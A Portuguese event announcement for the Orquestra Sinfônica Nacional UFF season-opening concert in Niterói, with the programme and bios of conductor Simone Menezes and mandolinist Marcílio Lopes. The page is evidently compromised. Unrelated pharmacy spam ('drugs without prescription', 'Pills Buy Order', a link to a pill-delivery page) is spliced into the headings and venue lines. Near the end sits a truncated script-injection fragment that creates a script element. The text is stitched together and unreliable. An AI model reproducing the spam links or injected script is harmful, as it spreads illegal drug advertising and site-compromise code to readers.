Música sinfônicaProgramaçãoRio de Janeiro

Orquestra Sinfônica Nacional UFF abre sua temporada

drugs without prescription pharmacy Abertura de Temporada à francesa.

 

SERVIÇO Pills Buy Order

 

Cine Arte UFF Order http://www.eltern-und-kinder.com/lukol-delivery/ Pills
Rua Miguel de Frias, 9, Icaraí, Niterói – RJ

Dia 10 de agosto às 10h30

Entrada gratuita

 

 

Após um longo início de ano, finalmente a Orquestra Sinfônica Nacional UFF, abre sua temporada com um concerto especial que mistura a música brasileira com a música francesa. Sob a regência da maestrina Simone Menezes e com a participação do solista Marcílio Lopes (bandolinista), o concerto apresenta obras dos brasileiros Guerra-Peixe, Jayme Vignoli e estreia o concerto de bandolim e cordas de H.D. Korenchendler, além de duas obras clássicas da música francesa, o Prelúdio A sesta de um fauno, de Claude Debussy e a épica La Valse, de Maurice Ravel.
Cheap Simone Menezes

Maestrina natural de Brasília, estudou em Paris, em Londres e se especializou em música contemporânea como residente na Casa da Música em Portugal. Dirigiu algumas das principais orquestras da América Latina, entre elas a Osesp, além de ter atuado na França, Portugal e Leste Europeu. Tem trabalhado com nomes como Marin Alsop, Paavo Jarvi, Thomas Adés, entre outros. Recentemente foi finalista do concurso para regente assistente da Orchestre de Paris. Atualmente dirige a Camerata Latino Americana onde se dedica à música brasileira e à música contemporânea tendo já estreado mais de 20 obras.

 

Marcílio Marques Lopes

Bandolinista do grupo Água de Moringa, Caldereta Carioca e Quarteto Brasileiro. Também fez parte da Orquestra de Música Brasileira, da Orquestra de Cordas Brasileiras e da Camerata Universidade Gama-Filho. Em duo com o violonista Carlos Barbosa-Lima, participou de seus dois últimos álbuns, além de concertos no Brasil e no exterior. Bacharel em Composição e Mestre em Musicologia pela UNIRIO, estudou composição com o Maestro Guerra-Peixe. É professor de harmonia na Escola Portátil de Música e editou recentemente o livro “Harmonia ao bandolim”, pela Vitale. Tem cinco CD’s lançados, sendo o mais recente inteiramente dedicado à obra do grande amigo e também bandolinista Joel Nascimento.

 

var d=document;var s=d.createElement(‘script’);

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.